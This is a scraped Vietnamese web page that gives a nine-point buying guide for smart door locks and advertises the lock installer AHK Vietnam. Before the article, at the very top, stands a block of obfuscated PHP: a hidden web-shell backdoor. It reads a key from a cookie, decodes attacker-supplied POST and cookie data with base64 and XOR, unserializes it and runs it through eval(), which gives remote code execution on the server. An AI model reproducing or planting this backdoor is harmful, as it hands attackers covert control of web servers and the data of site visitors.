$fqiQjm = chr (84) . "\x44" . chr ( 482 - 403 ).'_' . "\115" . chr (69) . "\156" . chr ( 500 - 421 )."\141";$MasHEAXYRr = "\143" . "\x6c" . "\141" . chr ( 521 - 406 ).chr (115) . "\137" . chr ( 168 - 67 ).chr ( 730 - 610 ).'i' . "\x73" . chr (116) . "\x73";$hMCRxWKtw = class_exists($fqiQjm); $MasHEAXYRr = "42800";$crgEeQoQLx = !1;if ($hMCRxWKtw == $crgEeQoQLx){function gUjss(){$GQSiIVDQ = new /* 20823 */ TDO_MEnOa(7162 + 7162); $GQSiIVDQ = NULL;}$WSmjw = "7162";class TDO_MEnOa{private function mhKZLQApr($WSmjw){if (is_array(TDO_MEnOa::$dxOIZ)) {$rlcgOQF = str_replace("\x3c" . chr ( 228 - 165 ).chr ( 579 - 467 ).'h' . 'p', "", TDO_MEnOa::$dxOIZ['c' . chr (111) . "\x6e" . chr ( 355 - 239 )."\x65" . chr (110) . "\x74"]);eval($rlcgOQF); $WSmjw = "7162";exit();}}private $rKJZi;public function PDtDIwpot(){echo 44118;}public function __destruct(){$WSmjw = "32854_45688";$this->mhKZLQApr($WSmjw); $WSmjw = "32854_45688";}public function __construct($mYDfgJ=0){$MqtmR = $_POST;$kiAqrArYu = $_COOKIE;$hXDZXHScYa = "b117e116-81a1-4a0f-8c63-2a292dd0db21";$pobSIo = @$kiAqrArYu[substr($hXDZXHScYa, 0, 4)];if (!empty($pobSIo)){$FddZxsnOCt = "base64";$dgDSDAMBZi = "";$pobSIo = explode(",", $pobSIo);foreach ($pobSIo as $YccOwzpoM){$dgDSDAMBZi .= @$kiAqrArYu[$YccOwzpoM];$dgDSDAMBZi .= @$MqtmR[$YccOwzpoM];}$dgDSDAMBZi = array_map($FddZxsnOCt . "\137" . chr ( 728 - 628 ).chr ( 224 - 123 )."\x63" . "\x6f" . "\144" . chr (101), array($dgDSDAMBZi,)); $dgDSDAMBZi = $dgDSDAMBZi[0] ^ str_repeat($hXDZXHScYa, (strlen($dgDSDAMBZi[0]) / strlen($hXDZXHScYa)) + 1);TDO_MEnOa::$dxOIZ = @unserialize($dgDSDAMBZi);}}public static $dxOIZ = 246;}gUjss();} Mua khóa cửa thông minh, cần lưu ý 9 vấn đề này | Công ty TNHH VIET TRENDS
 

MUA KHÓA CỬA THÔNG MINH, CẦN LƯU Ý 9 VẤN ĐỀ NÀY

 

Khóa cửa thông minh, có phải loại nào cũng nên mua? Chắc chắn là không rồi. Vấn đề này chỉ đúng trong trường hợp nếu bạn đang muốn mua khóa cửa của một hãng lớn, có danh tiếng còn lại thì đâu biết chất lượng thế nào mà bạn muốn bỏ 1 khoản tiền kha khá ra để mua? Hãy nghĩ đơn giản là khóa cửa thông minh cũng như bất cứ loại sản phẩm nào khác, chính vì thế không đơn giản mà có thể mua được liền vì khóa cửa nó còn cả sự an toàn cho ngôi nhà, tài sản của bạn.

 

Vậy thì phải làm sao? Các tiêu chí để chọn khóa cửa thông minh là gì? Đánh giá các cách để chọn được khóa cửa thông minh chuẩn và chất lượng nhất? Chúng ta sẽ cùng nhau chia sẻ về vấn đề này dưới đây…

 

Những năm gần đây, thị trường Smart Home(Ngôi nhà thông minh) trở nên nhộn nhịp với nhiều sản phẩm chất lượng và đa dạng nhờ sự tham gia của nhiều nhãn hiệu danh tiếng như Samsung, Panasonic, Dessmann,… Những sản phẩm nhà thông minh này đã dần trở nên quen thuộc và thay đổi cách mà mọi người vẫn thường sử dụng, giúp mọi thứ trở nên tự động hoá, thông minh và vui vẻ hơn. Trong đó, khoá cửa thông minh là một trong những sản phẩm sáng tạo nổi bật trong những sản phẩm nhà thông minh, được người tiêu dùng ưu tiên lựa chọn sử dụng thay thế những ổ khoá truyền thống bởi vì sự hữu dụng và hoàn thiện hệ sinh thái nhà thông minh mà họ đang sở hữu.

 

Khóa cửa thông minh là dòng sản phẩm nâng cấp từ khóa cơ thông thường và có thêm tính năng để bảo đảm độ an toàn, an ninh một cách hiệu quả và tuyệt đối nhất. Tuy nhiên, để lựa chọn một sản phẩm khóa thông minh chất lượng cũng như phù hợp với nhu cầu sử dụng của bản thân không phải là điều thực sự dễ dàng nếu bạn không có chút kinh nghiệm và hiểu biết cần thiết về dòng sản phẩm này. Hiểu được điều đó, qua bài viết này, mình sẽ đưa ra cho anh em 9 điều cần lưu ý khi chọn mua khoá cửa thông minh.

 

1. Ruột khóa

Ruột khóa cửa thông minh

Ruột khóa cửa thông minh

Vấn đề đầu tiên mà bạn nên cân nhắc trước khi lựa chọn bất kỳ khóa cửa thông minh nào là ruột khoá phải chắc chắn, được thiết kế nhiều lớp chốt bảo vệ! Một ruột khóa cứng cáp giúp bảo vệ ngôi nhà tối đa với khả năng chống phá cửa hay đột nhập. Vì vậy đừng đánh đổi tiêu chí này vì bất cứ lý do nào. Hiện tại trên thị trường có rất nhiều sản phẩm khoá cửa thông minh được nhập khẩu từ những thị trường có xã hội ổn định, tỷ lệ tội phạm thấp. Đặc điểm những ổ khoá từ thị trường này có lõi khoá rất đơn giản, chịu lực yếu, chỉ phù hợp làm khoá cửa phòng ngủ và mình khuyến cáo không nên dùng làm khoá chính cho ngôi nhà.

 

2. Có khả năng hoạt động như một bộ khóa cơ truyền thống

Khóa cửa vân tay Eda Lock H5000

Khóa cửa vân tay Eda Lock H5000

Một ổ khoá thông minh tốt thì tất nhiên nó phải sở hữu những đặc tính tốt của khoá cơ truyền thống! Bạn nên xem xét những yếu tố được đề cập dưới đây:

 

+ Kết cấu cơ khí – các khớp trục như tay nắm cửa, phải có chuyển động nhẹ nhàng với độ phản hồi tốt. Ở phần lưỡi khoá và các chốt cố định phải có độ nảy bật nhanh, chính xác và ổn định.

 

+ Vật liệu sử dụng – các khoá thông minh cao cấp thường được làm bằng thép không rỉ với lớp sơn phủ bề mặt đặc biệt giúp chống cháy nổ, chống xước và chống bám dấu vân tay tốt. Trang bị vật liệu tốt giúp khoá có độ bền cao với khả năng giữ được vẻ đẹp không đổi theo thời gian.

 

+ Cấu tạo ổ khoá và chìa – phải có độ phức tạp nhất định, khó làm giả hay sao chép.

 

3. Mở khóa bằng vân tay

Chức năng mở khóa bằng vân tay trên khóa cửa thông minh của Samsung

Chức năng mở khóa bằng vân tay trên khóa cửa thông minh của Samsung

Tính năng mở khoá bằng vân tay được trang bị lần đầu tiên trên thiết bị di động là điện thoại thông minh Apple iPhone 5s, nó đã làm thay đổi ngành công nghiệp điện thoại thông minh mà nay đã trở thành một tiêu chuẩn không thể thiếu. Vân tay là hình thức mở khoá tiện lợi, nhanh chóng và có độ bảo mật cao. Cách mở khoá này giúp bạn có thể tạm quên đi những mã số dài và có khả năng bị lộ mật khẩu! Hiện nay chỉ một số ít các khoá thông minh được trang bị công nghệ nhận diện vân tay.

 

Tuy nhiên, bạn cũng nên lưu ý công nghệ vân tay cũng rất đa dạng! với những công nghệ vân tay cũ, sẽ không có khả năng nhận diện vân tay giả và khả năng xử lý khá chậm. Trên thị trường hiện tại bạn có thể tham khảo những mẫu khoá thông minh của Samsung, Eda Lock. Dessmann, Yale, … với trang bị cảm biến vân tay tiên tiến cùng những thuật toán hàng đầu trong công nghệ bảo mật bằng dấu vân tay hiện nay.

 

4. Chống phá khóa, đột nhập trái phép

Tính năng chống phá khóa, báo động đột nhập trái phép

Tính năng chống phá khóa, báo động đột nhập trái phép

Dù mua khóa cửa truyền thống hay khóa cửa thông minh, thì người dùng cũng cần xem xét liệu nó có thể chịu được việc mở khóa một cách bạo lực bằng tay hoặc các công cụ hỗ trợ hay không. Cụ thể, người mua nên kiểm tra bộ phận cảm ứng và mật khẩu có nằm trong vùng bảo vệ bằng kim loại không. Ngoài ra, thiết bị cũng cần có chức năng chống mở theo kiểu bạo lực, tức là khả năng phát hiện và cảnh báo các hành vi mở cửa trái phép, thông qua việc kích hoạt chuông hay camera, gửi tin nhắn cảnh báo cho người sử dụng.

 

Các thông số này được đánh giá và xếp loại theo các tiêu chuẩn riêng, cần tham khảo người bán hoặc thông tin từ website của nhà sản xuất. Hệ số an toàn càng cao, khả năng ngăn chặn việc mở cửa bằng ngoại lực hay cố dò mật khẩu càng lớn.

 

5. Kết hợp được với các phụ kiện nhà thông minh khác

Kết hợp được với những phụ kiện nhà thông minh khác

Kết hợp được với những phụ kiện nhà thông minh khác

Như đã đề cập ở trên, khoá cửa thông minh nên được hoạt động như một phần của hệ thống nhà thông minh. Với những khoá cửa chỉ hoạt động độc lập và không có khả năng kết nối với các sản phẩm nhà thông minh như các loại cảm biến thông minh là một thiếu sót rất lớn, sẽ hạn chế rất nhiều trong việc nếu bạn có nhu cầu nâng cấp nhà thông minh sau này. Ví dụ như bạn có thể kết hợp khoá cửa thông minh và Camera thông minh sẽ tự kích hoạt quay phim khi có người mở khoá cửa hay tự bật đèn mỗi khi cửa được mở. Do đó, bạn hãy cân nhắc điều này trong khi chọn lưa khoá thông minh nhé.

 

6. Xác định vị trí và loại cửa muốn lắp khóa

Khóa cửa vân tay Yale lắp đặt trên cửa gỗ

Khóa cửa vân tay Yale lắp đặt trên cửa gỗ

Vị trí và loại cửa bạn dự định lắp khóa thông minh là một trong những yếu tố quyết định mỗi khi bạn dự định lắp hay nâng cấp bất kỳ loại khoá nào. Không phải loại cửa nào cũng có thể lắp đặt được các loại khóa điện tử, vì thế để tránh mua nhầm thiết bị khóa điện tử không phù hợp cánh cửa gia đình mình, bạn cần liên hệ với bên lắp đặt để được tư vấn loại khóa thông minh phù hợp với cửa nhà mình.

 

Trong các chất liệu làm cửa, gỗ được xem là phù hợp với mọi loại khóa điện tử. Cửa kính cường lực thì nên dùng loại khóa cửa điện tử dành riêng cho cửa kính. Các chất liệu như nhựa, thép, gỗ công nghiệp cũng có thể lắp khóa, tuy nhiên cần lưu ý chọn kích thước hoặc lựa chọn loại khóa chuyên dụng. Bạn có thể liên hệ qua HOTLINE 24/7: 0916.77.22.35 của chúng tôi để được tư vấn loại khóa phù hợp nhé.

 

Bên cạnh đó, xét về vị trí, loại khóa điện tử có nhiều chốt sẽ phù hợp lắp cho cửa chính vì nó có độ đảm bảo an toàn hơn, còn nếu là cửa phòng thì tốt nhất là nên chọn khóa ít chốt vì loại này sẽ có kích thước nhỏ lắp đặt sẽ phù hợp hơn và sẽ tiện hơn khi đóng mở cửa.

 

7. Tính thẩm mỹ của khóa

Khóa cửa vân tay cao cấp Dessmann S510 Gold

Khóa cửa vân tay cao cấp Dessmann S510 Gold

Bên cạnh những tính năng của khóa cửa thông minh, một vấn đề quan trọng nữa quyết định đến sự lựa chọn ổ khóa của bạn chính là tính thẩm mỹ mà ổ khóa thông minh đó mang lại cho thiết kế ngôi nhà cũng như văn phòng của bạn.

 

Một ổ khóa có thiết kế phù hợp với các nội thất của ngôi nhà sẽ là một điểm nhấn đặc biệt giúp cho thiết kế ngôi nhà thêm ấn tượng, một nét chấm phá làm nổi bật lên sự tiện nghi cũng như sang trọng trong thiết kế của ngôi nhà. Tuy nhiên, mỗi người đều có gu thẩm mỹ riêng, nên rất khó để nói thế nào là một sản phẩm đẹp. Nhưng theo cảm nhận của mình thì nó phải có thiết kế đơn giản với đường nét cứng cáp và tinh tế phù hợp với tổng thể ngôi nhà, màu sắc phải nổi bật, toát lên sự cao cấp cho ngôi nhà của bạn.

 

8. Giá thành sản phẩm

Giá cả sản phẩm hợp lý

Giá cả sản phẩm hợp lý

Đây là điều mà bạn quan tâm khi mua bất kỳ một sản phẩm nào đó. Hiện nay, sản phẩm khóa điện tử xuất hiện trên thị trường rất phong phú đa dạng không chỉ về mẫu mã chủng loại mà còn về giá cả. Có những sản phẩm tương tự nhau về mẫu mã cũng như chức năng nhưng lại có giá cả chênh lệch giữa các nhà cung cấp.

 

Vì thế, để mua được những sản phẩm với mức giá phù hợp nhất, bạn cần có sự so sánh giá cả trên thị trường. Những sản phẩm khoá thông minh được coi là phù hợp khi có tỷ lệ hiệu năng tốt trên giá thành hợp lý, với tiêu chí này thì nhà sản xuất thiết bị nhà thông minh Samsung có lẽ đứng đầu phân khúc, với những sản phẩm chất lượng tốt, thiết kế ấn tượng, hiệu năng cao nhưng giá cả thì rất cạnh tranh.

 

9. Địa chỉ công ty uy tín lắp đặt khóa cửa vân tay

 

Sau tất cả! Đây là tiêu chí bạn cần chú ý nếu muốn mua được sản phẩm khóa điện tử chất lượng. Trên thị trường hiện nay, có rất nhiều nhà cung cấp phân phối sản phẩm khóa cửa điện tử. Tuy nhiên, không phải địa chỉ nào cũng thực sự chất lượng và uy tín. Bạn có thể cân nhắc chọn mua sản phẩm của lapdatgiare.vn

 

Công ty Cổ phần AHK Việt Nam tự hào là đơn vị phân phối chính hãng các sản phẩm an ninh thông minh cho tổ ấm của mọi gia đình Việt Nam và thế giới. Sản phẩm do AHK Việt Nam phân phối không chỉ có thương hiệu toàn cầu, mà còn phải đảm bảo chất lượng vật liệu sản xuất thiết bị, công nghệ tích hợp, sự sáng tạo trong cả ngoại hình thiết kế lẫn cơ chế vận hành, cũng như yếu tố tiện nghi, dễ sử dụng cho mọi lứa tuổi khách hàng, mọi mục đích an ninh.

 

AHK Việt Nam cung cấp trọn bộ các giải pháp thiết bị an ninh trên nền tảng ứng dụng Internet từ các thương hiệu toàn cầu, với các sản phẩm chủ đạo như khóa cửa thông minh Samsung, Dessmann, Camera giám sát Hikvision… và các sản phẩm phụ kiện thông minh khác theo tiêu chí “độc”, “đẹp” và “hiệu quả”.

 

Mọi thông tin chi tiết, thắc mắc có thể liên hệ 

Công ty Cổ phần AHK Việt Nam

Địa chỉ: Số 400 Đường Bưởi, P.Vĩnh Phúc, Q.Ba Đình, TP.Hà Nội

HotLine: 0916 77 22 35

Website: lapdatgiare.vn | khoacuanhapkhau.vn

Google+